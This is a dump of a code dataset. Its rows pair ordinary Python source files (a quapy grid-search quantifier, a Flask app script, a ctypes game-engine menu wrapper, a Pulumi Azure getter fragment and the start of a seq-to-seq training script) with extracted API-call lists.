'import pulumi\\n'), ((6877, 6916), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"auto_delete_on_idle\"\"\"'], {}), \"(self, 'auto_delete_on_idle')\\n\", (6887, 6916), False, 'import pulumi\\n'), ((7177, 7221), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"client_affine_properties\"\"\"'], {}), \"(self, 'client_affine_properties')\\n\", (7187, 7221), False, 'import pulumi\\n'), ((7416, 7449), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"count_details\"\"\"'], {}), \"(self, 'count_details')\\n\", (7426, 7449), False, 'import pulumi\\n'), ((7618, 7648), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"created_at\"\"\"'], {}), \"(self, 'created_at')\\n\", (7628, 7648), False, 'import pulumi\\n'), ((7961, 8027), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"dead_lettering_on_filter_evaluation_exceptions\"\"\"'], {}), \"(self, 'dead_lettering_on_filter_evaluation_exceptions')\\n\", (7971, 8027), False, 'import pulumi\\n'), ((8312, 8368), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"dead_lettering_on_message_expiration\"\"\"'], {}), \"(self, 'dead_lettering_on_message_expiration')\\n\", (8322, 8368), False, 'import pulumi\\n'), ((8781, 8829), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"default_message_time_to_live\"\"\"'], {}), \"(self, 'default_message_time_to_live')\\n\", (8791, 8829), False, 'import pulumi\\n'), ((9150, 9209), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"duplicate_detection_history_time_window\"\"\"'], {}), \"(self, 'duplicate_detection_history_time_window')\\n\", (9160, 9209), False, 'import pulumi\\n'), ((9455, 9500), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"enable_batched_operations\"\"\"'], {}), \"(self, 'enable_batched_operations')\\n\", (9465, 9500), False, 'import pulumi\\n'), ((9738, 9791), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"forward_dead_lettered_messages_to\"\"\"'], {}), \"(self, 'forward_dead_lettered_messages_to')\\n\", (9748, 9791), False, 'import pulumi\\n'), ((9975, 10005), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"forward_to\"\"\"'], {}), \"(self, 'forward_to')\\n\", (9985, 10005), False, 'import pulumi\\n'), ((10124, 10146), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"id\"\"\"'], {}), \"(self, 'id')\\n\", (10134, 10146), False, 'import pulumi\\n'), ((10381, 10417), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"is_client_affine\"\"\"'], {}), \"(self, 'is_client_affine')\\n\", (10391, 10417), False, 'import pulumi\\n'), ((10651, 10684), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"lock_duration\"\"\"'], {}), \"(self, 'lock_duration')\\n\", (10661, 10684), False, 'import pulumi\\n'), ((10872, 10910), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"max_delivery_count\"\"\"'], {}), \"(self, 'max_delivery_count')\\n\", (10882, 10910), False, 'import pulumi\\n'), ((11071, 11104), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"message_count\"\"\"'], {}), \"(self, 'message_count')\\n\", (11081, 11104), False, 'import pulumi\\n'), ((11227, 11251), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"name\"\"\"'], {}), \"(self, 'name')\\n\", (11237, 11251), False, 'import pulumi\\n'), ((11476, 11512), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"requires_session\"\"\"'], {}), \"(self, 'requires_session')\\n\", (11486, 11512), False, 'import pulumi\\n'), ((11702, 11728), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"status\"\"\"'], {}), \"(self, 'status')\\n\", (11712, 11728), False, 'import pulumi\\n'), ((11936, 11967), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"system_data\"\"\"'], {}), \"(self, 'system_data')\\n\", (11946, 11967), False, 'import pulumi\\n'), ((12090, 12114), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"type\"\"\"'], {}), \"(self, 'type')\\n\", (12100, 12114), False, 'import pulumi\\n'), ((12287, 12317), 'pulumi.get', 'pulumi.get', (['self', '\"\"\"updated_at\"\"\"'], {}), \"(self, 'updated_at')\\n\", (12297, 12317), False, 'import pulumi\\n'), ((14701, 14723), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\\n', (14721, 14723), False, 'import pulumi\\n'), ((14815, 14953), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['\"\"\"azure-native:servicebus/v20210601preview:getSubscription\"\"\"', '__args__'], {'opts': 'opts', 'typ': 'GetSubscriptionResult'}), \"(\\n 'azure-native:servicebus/v20210601preview:getSubscription', __args__,\\n opts=opts, typ=GetSubscriptionResult)\\n\", (14836, 14953), False, 'import pulumi\\n')]"}}},{"rowIdx":794,"cells":{"code":{"kind":"string","value":"import itertools\nimport signal\nfrom copy import deepcopy\nfrom typing import Union, Callable\n\nimport numpy as np\n\nimport quapy as qp\nfrom quapy.data.base import LabelledCollection\nfrom quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\nfrom quapy.method.aggregative import BaseQuantifier\nimport inspect\n\nfrom util import _check_sample_size\n\n\nclass GridSearchQ(BaseQuantifier):\n \"\"\"Grid Search optimization targeting a quantification-oriented metric.\n\n Optimizes the hyperparameters of a quantification method, based on an evaluation method and on an evaluation\n protocol for quantification.\n\n :param model: the quantifier to optimize\n :type model: BaseQuantifier\n :param param_grid: a dictionary with keys the parameter names and values the list of values to explore\n :param sample_size: the size of the samples to extract from the validation set (ignored if protocl='gen')\n :param protocol: either 'app' for the artificial prevalence protocol, 'npp' for the natural prevalence\n protocol, or 'gen' for using a custom sampling generator function\n :param n_prevpoints: if specified, indicates the number of equally distant points to extract from the interval\n [0,1] in order to define the prevalences of the samples; e.g., if n_prevpoints=5, then the prevalences for\n each class will be explored in [0.00, 0.25, 0.50, 0.75, 1.00]. If not specified, then eval_budget is requested.\n Ignored if protocol!='app'.\n :param n_repetitions: the number of repetitions for each combination of prevalences. This parameter is ignored\n for the protocol='app' if eval_budget is set and is lower than the number of combinations that would be\n generated using the value assigned to n_prevpoints (for the current number of classes and n_repetitions).\n Ignored for protocol='npp' and protocol='gen' (use eval_budget for setting a maximum number of samples in\n those cases).\n :param eval_budget: if specified, sets a ceil on the number of evaluations to perform for each hyper-parameter\n combination. For example, if protocol='app', there are 3 classes, n_repetitions=1 and eval_budget=20, then\n n_prevpoints will be set to 5, since this will generate 15 different prevalences, i.e., [0, 0, 1],\n [0, 0.25, 0.75], [0, 0.5, 0.5] ... [1, 0, 0], and since setting it to 6 would generate more than\n 20. When protocol='gen', indicates the maximum number of samples to generate, but less samples will be\n generated if the generator yields less samples.\n :param error: an error function (callable) or a string indicating the name of an error function (valid ones\n are those in qp.error.QUANTIFICATION_ERROR\n :param refit: whether or not to refit the model on the whole labelled collection (training+validation) with\n the best chosen hyperparameter combination. Ignored if protocol='gen'\n :param val_split: either a LabelledCollection on which to test the performance of the different settings, or\n a float in [0,1] indicating the proportion of labelled data to extract from the training set, or a callable\n returning a generator function each time it is invoked (only for protocol='gen').\n :param n_jobs: number of parallel jobs\n :param random_seed: set the seed of the random generator to replicate experiments. Ignored if protocol='gen'.\n :param timeout: establishes a timer (in seconds) for each of the hyperparameters configurations being tested.\n Whenever a run takes longer than this timer, that configuration will be ignored. If all configurations end up\n being ignored, a TimeoutError exception is raised. If -1 (default) then no time bound is set.\n :param verbose: set to True to get information through the stdout\n \"\"\"\n\n def __init__(self,\n model: BaseQuantifier,\n param_grid: dict,\n sample_size: Union[int, None] = None,\n protocol='app',\n n_prevpoints: int = None,\n n_repetitions: int = 1,\n eval_budget: int = None,\n error: Union[Callable, str] = qp.error.mae,\n refit=True,\n val_split=0.4,\n n_jobs=1,\n random_seed=42,\n timeout=-1,\n verbose=False):\n\n self.model = model\n self.param_grid = param_grid\n self.sample_size = sample_size\n self.protocol = protocol.lower()\n self.n_prevpoints = n_prevpoints\n self.n_repetitions = n_repetitions\n self.eval_budget = eval_budget\n self.refit = refit\n self.val_split = val_split\n self.n_jobs = n_jobs\n self.random_seed = random_seed\n self.timeout = timeout\n self.verbose = verbose\n self.__check_error(error)\n assert self.protocol in {'app', 'npp', 'gen'}, \\\n 'unknown protocol: valid ones are \"app\" or \"npp\" for the \"artificial\" or the \"natural\" prevalence ' \\\n 'protocols. Use protocol=\"gen\" when passing a generator function thorough val_split that yields a ' \\\n 'sample (instances) and their prevalence (ndarray) at each iteration.'\n assert self.eval_budget is None or isinstance(self.eval_budget, int)\n if self.protocol in ['npp', 'gen']:\n if self.protocol=='npp' and (self.eval_budget is None or self.eval_budget <= 0):\n raise ValueError(f'when protocol=\"npp\" the parameter eval_budget should be '\n f'indicated (and should be >0).')\n if self.n_repetitions != 1:\n print('[warning] n_repetitions has been set and will be ignored for the selected protocol')\n\n def _sout(self, msg):\n if self.verbose:\n print(f'[{self.__class__.__name__}]: {msg}')\n\n def __check_training_validation(self, training, validation):\n if isinstance(validation, LabelledCollection):\n return training, validation\n elif isinstance(validation, float):\n assert 0. < validation < 1., 'validation proportion should be in (0,1)'\n training, validation = training.split_stratified(train_prop=1 - validation, random_state=self.random_seed)\n return training, validation\n elif self.protocol=='gen' and inspect.isgenerator(validation()):\n return training, validation\n else:\n raise ValueError(f'\"validation\" must either be a LabelledCollection or a float in (0,1) indicating the'\n f'proportion of training documents to extract (type found: {type(validation)}). '\n f'Optionally, \"validation\" can be a callable function returning a generator that yields '\n f'the sample instances along with their true prevalence at each iteration by '\n f'setting protocol=\"gen\".')\n\n def __check_error(self, error):\n if error in qp.error.QUANTIFICATION_ERROR:\n self.error = error\n elif isinstance(error, str):\n self.error = qp.error.from_name(error)\n elif hasattr(error, '__call__'):\n self.error = error\n else:\n raise ValueError(f'unexpected error type; must either be a callable function or a str representing\\n'\n f'the name of an error function in {qp.error.QUANTIFICATION_ERROR_NAMES}')\n\n def __generate_predictions(self, model, val_split):\n commons = {\n 'n_repetitions': self.n_repetitions,\n 'n_jobs': self.n_jobs,\n 'random_seed': self.random_seed,\n 'verbose': False\n }\n if self.protocol == 'app':\n return artificial_prevalence_prediction(\n model, val_split, self.sample_size,\n n_prevpoints=self.n_prevpoints,\n eval_budget=self.eval_budget,\n **commons\n )\n elif self.protocol == 'npp':\n return natural_prevalence_prediction(\n model, val_split, self.sample_size,\n **commons)\n elif self.protocol == 'gen':\n return gen_prevalence_prediction(model, gen_fn=val_split, eval_budget=self.eval_budget)\n else:\n raise ValueError('unknown protocol')\n\n def fit(self, training: LabelledCollection, val_split: Union[LabelledCollection, float, Callable] = None):\n \"\"\" Learning routine. Fits methods with all combinations of hyperparameters and selects the one minimizing\n the error metric.\n\n :param training: the training set on which to optimize the hyperparameters\n :param val_split: either a LabelledCollection on which to test the performance of the different settings, or\n a float in [0,1] indicating the proportion of labelled data to extract from the training set\n :return: self\n \"\"\"\n if val_split is None:\n val_split = self.val_split\n training, val_split = self.__check_training_validation(training, val_split)\n if self.protocol != 'gen':\n self.sample_size = _check_sample_size(self.sample_size)\n\n params_keys = list(self.param_grid.keys())\n params_values = list(self.param_grid.values())\n\n model = self.model\n\n if self.timeout > 0:\n def handler(signum, frame):\n self._sout('timeout reached')\n raise TimeoutError()\n\n signal.signal(signal.SIGALRM, handler)\n\n self.param_scores_ = {}\n self.best_score_ = None\n some_timeouts = False\n for values in itertools.product(*params_values):\n params = dict({k: values[i] for i, k in enumerate(params_keys)})\n\n if self.timeout > 0:\n signal.alarm(self.timeout)\n\n try:\n # overrides default parameters with the parameters being explored at this iteration\n model.set_params(**params)\n model.fit(training)\n true_prevalences, estim_prevalences = self.__generate_predictions(model, val_split)\n score = self.error(true_prevalences, estim_prevalences)\n\n self._sout(f'checking hyperparams={params} got {self.error.__name__} score {score:.5f}')\n if self.best_score_ is None or score < self.best_score_:\n self.best_score_ = score\n self.best_params_ = params\n self.best_model_ = deepcopy(model)\n self.param_scores_[str(params)] = score\n\n if self.timeout > 0:\n signal.alarm(0)\n except TimeoutError:\n print(f'timeout reached for config {params}')\n some_timeouts = True\n\n if self.best_score_ is None and some_timeouts:\n raise TimeoutError('all jobs took more than the timeout time to end')\n\n self._sout(f'optimization finished: best params {self.best_params_} (score={self.best_score_:.5f})')\n\n if self.refit:\n self._sout(f'refitting on the whole development set')\n self.best_model_.fit(training + val_split)\n\n return self\n\n def quantify(self, instances):\n \"\"\"Estimate class prevalence values using the best model found after calling the :meth:`fit` method.\n\n :param instances: sample contanining the instances\n :return: a ndarray of shape `(n_classes)` with class prevalence estimates as according to the best model found\n by the model selection process.\n \"\"\"\n assert hasattr(self, 'best_model_'), 'quantify called before fit'\n return self.best_model().quantify(instances)\n\n @property\n def classes_(self):\n \"\"\"\n Classes on which the quantifier has been trained on.\n :return: a ndarray of shape `(n_classes)` with the class identifiers\n \"\"\"\n return self.best_model().classes_\n\n def set_params(self, **parameters):\n \"\"\"Sets the hyper-parameters to explore.\n\n :param parameters: a dictionary with keys the parameter names and values the list of values to explore\n \"\"\"\n self.param_grid = parameters\n\n def get_params(self, deep=True):\n \"\"\"Returns the dictionary of hyper-parameters to explore (`param_grid`)\n\n :param deep: Unused\n :return: the dictionary `param_grid`\n \"\"\"\n return self.param_grid\n\n def best_model(self):\n \"\"\"\n Returns the best model found after calling the :meth:`fit` method, i.e., the one trained on the combination\n of hyper-parameters that minimized the error function.\n\n :return: a trained quantifier\n \"\"\"\n if hasattr(self, 'best_model_'):\n return self.best_model_\n raise ValueError('best_model called before fit')\n"},"apis":{"kind":"list like","value":["quapy.evaluation.natural_prevalence_prediction","signal.signal","util._check_sample_size","itertools.product","quapy.error.from_name","quapy.evaluation.artificial_prevalence_prediction","quapy.evaluation.gen_prevalence_prediction","signal.alarm","copy.deepcopy"],"string":"[\n \"quapy.evaluation.natural_prevalence_prediction\",\n \"signal.signal\",\n \"util._check_sample_size\",\n \"itertools.product\",\n \"quapy.error.from_name\",\n \"quapy.evaluation.artificial_prevalence_prediction\",\n \"quapy.evaluation.gen_prevalence_prediction\",\n \"signal.alarm\",\n \"copy.deepcopy\"\n]"},"extract_api":{"kind":"string","value":"[((9694, 9727), 'itertools.product', 'itertools.product', (['*params_values'], {}), '(*params_values)\\n', (9711, 9727), False, 'import itertools\\n'), ((7798, 7943), 'quapy.evaluation.artificial_prevalence_prediction', 'artificial_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {'n_prevpoints': 'self.n_prevpoints', 'eval_budget': 'self.eval_budget'}), '(model, val_split, self.sample_size,\\n n_prevpoints=self.n_prevpoints, eval_budget=self.eval_budget, **commons)\\n', (7830, 7943), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\\n'), ((9200, 9236), 'util._check_sample_size', '_check_sample_size', (['self.sample_size'], {}), '(self.sample_size)\\n', (9218, 9236), False, 'from util import _check_sample_size\\n'), ((9538, 9576), 'signal.signal', 'signal.signal', (['signal.SIGALRM', 'handler'], {}), '(signal.SIGALRM, handler)\\n', (9551, 9576), False, 'import signal\\n'), ((7169, 7194), 'quapy.error.from_name', 'qp.error.from_name', (['error'], {}), '(error)\\n', (7187, 7194), True, 'import quapy as qp\\n'), ((8074, 8150), 'quapy.evaluation.natural_prevalence_prediction', 'natural_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {}), '(model, val_split, self.sample_size, **commons)\\n', (8103, 8150), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\\n'), ((9856, 9882), 'signal.alarm', 'signal.alarm', (['self.timeout'], {}), '(self.timeout)\\n', (9868, 9882), False, 'import signal\\n'), ((8240, 8325), 'quapy.evaluation.gen_prevalence_prediction', 'gen_prevalence_prediction', (['model'], {'gen_fn': 'val_split', 'eval_budget': 'self.eval_budget'}), '(model, gen_fn=val_split, eval_budget=self.eval_budget\\n )\\n', (8265, 8325), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\\n'), ((10562, 10577), 'copy.deepcopy', 'deepcopy', (['model'], {}), '(model)\\n', (10570, 10577), False, 'from copy import deepcopy\\n'), ((10692, 10707), 'signal.alarm', 'signal.alarm', (['(0)'], {}), '(0)\\n', (10704, 10707), False, 'import signal\\n')]"}}},{"rowIdx":795,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\nimport os\nfrom flask_migrate import Migrate\nfrom app import create_app, db\nfrom app.models import User, Role, PoseToLocation\n\n\n\napp = create_app(os.getenv('FLASK_CONFIG') or 'default')\nmigrate = Migrate(app, db)\n\n\n# migrate 的新建 我们需要扫描到这些文件我们才能创建\n@app.shell_context_processor\ndef make_shell_context():\n return dict(db=db, User=User, Role=Role, PoseToLocation=PoseToLocation)\n\n\n# 单元测试\n@app.cli.command()\ndef test():\n \"\"\" run the unit tests \"\"\"\n import unittest\n tests = unittest.TestLoader().discover('tests')\n unittest.TextTestRunner(verbosity=2).run(tests)\n"},"apis":{"kind":"list like","value":["unittest.TestLoader","flask_migrate.Migrate","unittest.TextTestRunner","os.getenv"],"string":"[\n \"unittest.TestLoader\",\n \"flask_migrate.Migrate\",\n \"unittest.TextTestRunner\",\n \"os.getenv\"\n]"},"extract_api":{"kind":"string","value":"[((220, 236), 'flask_migrate.Migrate', 'Migrate', (['app', 'db'], {}), '(app, db)\\n', (227, 236), False, 'from flask_migrate import Migrate\\n'), ((170, 195), 'os.getenv', 'os.getenv', (['\"\"\"FLASK_CONFIG\"\"\"'], {}), \"('FLASK_CONFIG')\\n\", (179, 195), False, 'import os\\n'), ((505, 526), 'unittest.TestLoader', 'unittest.TestLoader', ([], {}), '()\\n', (524, 526), False, 'import unittest\\n'), ((549, 585), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {'verbosity': '(2)'}), '(verbosity=2)\\n', (572, 585), False, 'import unittest\\n')]"}}},{"rowIdx":796,"cells":{"code":{"kind":"string","value":"# Jetfuel Game Engine- A SDL-based 2D game-engine\n# Copyright (C) 2018 InfernoStudios\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom ctypes import c_uint\nfrom ctypes import c_int \nfrom ctypes import c_void_p\nfrom ctypes import c_bool\nfrom ctypes import c_wchar_p\n\nfrom jetfuel.draw.rectangleinterface import rectangle_interface\nfrom jetfuel.draw.image import image\n\nclass menu(rectangle_interface):\n def __init__(self, jetfuelsoloader, maxheight=None, columngap=None, \n buttongap=None):\n self._jetfuel = jetfuelsoloader.jetfuelso;\n \n if(maxheight is not None and columngap is not None and \n buttongap is not None):\n self._jetfuel.Menu_new_from_heights_and_gaps.argtypes = [c_uint,\n c_uint,\n c_uint];\n self._jetfuel.Menu_new_from_heights_and_gaps.restype = c_void_p;\n \n self.drawableref = self._jetfuel.Menu_new_from_heights_and_gaps(\n maxheight,\n columngap,\n buttongap);\n else:\n self._jetfuel.Menu_new.restype = c_void_p;\n \n self.drawableref = self._jetfuel.Menu_new();\n print(\"Constructed empty drawableref!\");\n \n def get_max_height(self):\n self._jetfuel.Menu_get_max_height.argtypes = [c_void_p];\n self._jetfuel.Menu_get_max_height.restype = c_uint;\n \n return self._jetfuel.Menu_get_max_height(self.drawableref);\n \n def set_max_height(self, maxheight):\n self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint];\n \n self._jetfuel.Menu_set_max_height(self.drawableref, maxheight);\n \n def get_column_gap(self):\n self._jetfuel.Menu_get_column_gap.argtypes = [c_void_p];\n self._jetfuel.Menu_get_column_gap.restype = c_uint;\n \n return self._jetfuel.Menu_get_column_gap(self.drawableref);\n \n def set_column_gap(self, columngap):\n self._jetfuel.Menu_set_column_gap.argtypes = [c_void_p, c_uint];\n \n self._jetfuel.Menu_set_column_height(self.drawableref, columngap);\n \n def get_button_gap(self):\n self._jetfuel.Menu_get_button_gap.argtypes = [c_void_p];\n self._jetfuel.Menu_get_button_gap.restype = c_uint;\n \n return self._jetfuel.Menu_get_column_gap(self.drawableref);\n \n def set_button_gap(self, buttongap):\n self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint];\n \n self._jetfuel.Menu_set_max_height(self.drawableref, buttongap); \n \n def get_container_box_image(self, jetfuelsoloader):\n self._jetfuel.Menu_get_container_box_image.argtypes = [c_void_p];\n self._jetfuel.Menu_get_container_box_image.restype = c_void_p;\n \n containerboximage = image(jetfuelsoloader);\n \n self._jetfuel.Image_delete.argtypes = [c_void_p];\n \n self._jetfuel.Image_delete(containerboximage.imageref);\n \n containerboximage.imageref = self._jetfuel.Menu_get_container_box_image(\n self.drawableref);\n \n return containerboximage;\n \n def set_container_box_image(self, image, borderwidth, borderheight):\n self._jetfuel.Menu_set_container_box_image.argtypes = [c_void_p, \n c_void_p, c_uint,\n c_uint];\n \n self._jetfuel.Menu_set_container_box_image(image.imageref, borderwidth,\n borderheight);\n \n def get_container_box_border_width(self):\n self._jetfuel.Menu_get_container_box_border_width.argtypes = [c_void_p];\n self._jetfuel.Menu_get_container_box_border_width.restype = c_uint;\n \n return self._jetfuel.Menu_get_container_box_border_width(\n self.drawableref);\n \n def get_container_box_border_height(self):\n self._jetfuel.Menu_get_container_box_border_height.argtypes = [c_void_p];\n self._jetfuel.Menu_get_container_box_border_height.restype = c_uint;\n \n return self._jetfuel.Menu_get_container_box_border_height(\n self.drawableref);\n \n def add_button(self, buttoncharsreplacement, uisactiontowatchfor, \n messagetosenduponclick, messagebus):\n self._jetfuel.Menu_add_button.argtypes = [c_void_p, c_void_p, \n c_wchar_p, c_wchar_p, \n c_void_p];\n self._jetfuel.Menu_add_button.restype = c_bool;\n \n return self._jetfuel.Menu_add_button(self.drawableref, \n buttoncharsreplacement.buttoncharsref,\n uisactiontowatchfor,\n messagetosenduponclick,\n messagebus.messagebusref);\n \n def get_position_x(self):\n self._jetfuel.Menu_get_position_x.argtypes = [c_void_p];\n self._jetfuel.Menu_get_position_x.restype = c_int;\n \n return self.Menu_get_position_x(self.drawableref);\n \n def get_position_y(self):\n self._jetfuel.Menu_get_position_y.argtypes = [c_void_p];\n self._jetfuel.Menu_get_position_y.restype = c_int;\n \n return self.Menu_get_position_y(self.drawableref);\n \n def set_position(self, x, y):\n self._jetfuel.Menu_set_position.argtypes = [c_void_p, c_int, c_int];\n \n self._jetfuel.Menu_set_position(self.drawableref, x, y);\n \n def get_rect_to_draw_width(self):\n self._jetfuel.Menu_get_rect_to_draw_width.argtypes = [c_void_p];\n self._jetfuel.Menu_get_rect_to_draw_width.restype = c_int;\n \n return self.Menu_get_rect_to_draw_width(self.drawableref);\n \n def get_rect_to_draw_height(self):\n self._jetfuel.Menu_get_rect_to_draw_height.argtypes = [c_void_p];\n self._jetfuel.Menu_get_rect_to_draw_height.restype = c_int;\n \n return self.Menu_get_rect_to_draw_height(self.drawableref);\n"},"apis":{"kind":"list like","value":["jetfuel.draw.image.image"],"string":"[\n \"jetfuel.draw.image.image\"\n]"},"extract_api":{"kind":"string","value":"[((3591, 3613), 'jetfuel.draw.image.image', 'image', (['jetfuelsoloader'], {}), '(jetfuelsoloader)\\n', (3596, 3613), False, 'from jetfuel.draw.image import image\\n')]"}}},{"rowIdx":797,"cells":{"code":{"kind":"string","value":"# coding=utf-8\n# Copyright 2021 The Google Research Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# python3\n\"\"\"Train seq-to-seq model on random supervised training tasks.\"\"\"\n\n# pytype: disable=wrong-arg-count\n# pytype: disable=attribute-error\n\nimport collections\nimport functools\nimport json\nimport os\nimport random\nimport sys\nimport time\n\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nfrom flax import jax_utils\nfrom flax import linen as nn\nfrom flax import optim\nfrom flax.metrics import tensorboard\nfrom flax.training import checkpoints\nfrom flax.training import common_utils\nimport jax\nimport jax.numpy as jnp\nimport numpy as np\nimport tensorflow.compat.v2 as tf\n\nfrom latent_programmer import decode\nfrom latent_programmer import models as base_models\nfrom latent_programmer.decomposition_transformer_attention import decomposition_models as models\nfrom latent_programmer.decomposition_transformer_attention import input_pipeline\nfrom latent_programmer.tasks.robust_fill import dsl\nfrom latent_programmer.tasks.robust_fill import tokens as dsl_tokens\n\nsys.path.append('../../')\ngfile = tf.io.gfile\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_integer('seed', 0, 'Fixed random seed for training.')\nflags.DEFINE_float('lr', 1e-3, 'Learning rate.')\nflags.DEFINE_float('weight_decay', 1e-1,\n 'Decay factor for AdamW-style weight decay.')\nflags.DEFINE_integer('embedding_dim', 256, 'Embedding dimension.')\nflags.DEFINE_integer('hidden_dim', 512, 'Hidden dimension.')\nflags.DEFINE_integer('num_heads', 4, 'Number of layers.')\nflags.DEFINE_integer('num_layers', 3, 'Number of Transformer heads.')\nflags.DEFINE_boolean('slow_decode', True, 'Use slow decoding for prediction?')\n\nflags.DEFINE_string('dataset_filepattern', None,\n 'Filepattern for TFRecord dataset.')\nflags.DEFINE_integer('per_device_batch_size', 16,\n 'Number of program tasks in a batch.')\nflags.DEFINE_integer('num_strings_per_task', 4,\n 'Number of input/output strings per task.')\nflags.DEFINE_integer('max_program_length', 100,\n 'Maximum number of tokens in program.')\nflags.DEFINE_integer('max_characters', 120,\n 'Maximum number of characters in input/output strings.')\n\nflags.DEFINE_string('save_dir', None, 'Directory to save results to.')\nflags.DEFINE_integer('num_train_steps', 2000000, 'Number of training steps.')\nflags.DEFINE_integer('num_eval_steps', 10, 'Number of evaluation steps.')\nflags.DEFINE_integer('log_freq', 1000, 'Number of steps between training logs.')\nflags.DEFINE_integer('eval_freq', 2000, 'Number of steps between eval.')\nflags.DEFINE_integer('predict_freq', 50000,\n 'Number of steps between prediction (beam search).')\nflags.DEFINE_integer('checkpoint_freq', 50000,\n 'Number of steps between checkpoint saves.')\nflags.DEFINE_integer('finetune_start_step', -1,\n 'Step the initial checkpoint should start at for '\n 'finetuning, or -1 if not finetuning.')\nflags.DEFINE_bool('restore_checkpoints', True,\n 'Whether to restore from existing model checkpoints.')\n\nflags.DEFINE_string('attention_mask_type', 'bos_full_attention',\n 'The kind of attention mask to use. Options are: baseline, '\n 'bos_to_bos, bos_full_attention')\n\nflags.DEFINE_bool('use_relative_attention', True,\n 'Whether to use relative positonal embeddings.')\nflags.DEFINE_bool('bos_special_attention', False,\n 'Whether to use special relative attention computation for '\n 'BOS tokens.')\n\n\n_internal = False\nif not _internal:\n flags.DEFINE_string('xm_parameters', None,\n 'String specifying hyperparamter search.')\n\n\ndef create_learning_rate_scheduler(\n base_learning_rate=0.5,\n factors='constant * linear_warmup * rsqrt_normalized_decay',\n warmup_steps=16000,\n decay_factor=0.5,\n steps_per_decay=50000,\n steps_per_cycle=100000):\n \"\"\"Creates learning rate schedule.\n\n Interprets factors in the factors string which can consist of:\n * constant: interpreted as the constant value,\n * linear_warmup: interpreted as linear warmup until warmup_steps,\n * rsqrt_decay: divide by square root of max(step, warmup_steps)\n * decay_every: Every k steps decay the learning rate by decay_factor.\n * cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.\n\n Args:\n base_learning_rate: float, the starting constant for the lr schedule.\n factors: a string with factors separated by '*' that defines the schedule.\n warmup_steps: how many steps to warm up for in the warmup schedule.\n decay_factor: The amount to decay the learning rate by.\n steps_per_decay: How often to decay the learning rate.\n steps_per_cycle: Steps per cycle when using cosine decay.\n\n Returns:\n A function learning_rate(step): float -> {'learning_rate': float}, the\n step-dependent lr.\n \"\"\"\n factors = [n.strip() for n in factors.split('*')]\n\n def step_fn(step):\n \"\"\"Step to learning rate function.\"\"\"\n ret = 1.0\n for name in factors:\n if name == 'constant':\n ret *= base_learning_rate\n elif name == 'linear_warmup':\n ret *= jnp.minimum(1.0, step / warmup_steps)\n elif name == 'rsqrt_decay':\n ret /= jnp.sqrt(jnp.maximum(1.0, step - warmup_steps))\n elif name == 'rsqrt_normalized_decay':\n ret *= jnp.sqrt(warmup_steps)\n ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))\n elif name == 'decay_every':\n ret *= (decay_factor**(step // steps_per_decay))\n elif name == 'cosine_decay':\n progress = jnp.maximum(0.0,\n (step - warmup_steps) / float(steps_per_cycle))\n ret *= jnp.maximum(0.0,\n 0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0))))\n else:\n raise ValueError('Unknown factor %s.' % name)\n return jnp.asarray(ret, dtype=jnp.float32)\n\n return step_fn\n\n\ndef compute_weighted_cross_entropy(logits, targets, weights=None):\n \"\"\"Compute weighted cross entropy and entropy for log probs and targets.\n\n Args:\n logits: `[batch, length, num_classes]` float array.\n targets: categorical targets `[batch, length]` int array.\n weights: None or array of shape [batch, length, 1]\n\n Returns:\n Tuple of scalar loss and batch normalizing factor.\n \"\"\"\n if logits.ndim != targets.ndim + 1:\n raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %\n (str(logits.shape), str(targets.shape)))\n\n onehot_targets = common_utils.onehot(targets, logits.shape[-1])\n loss = 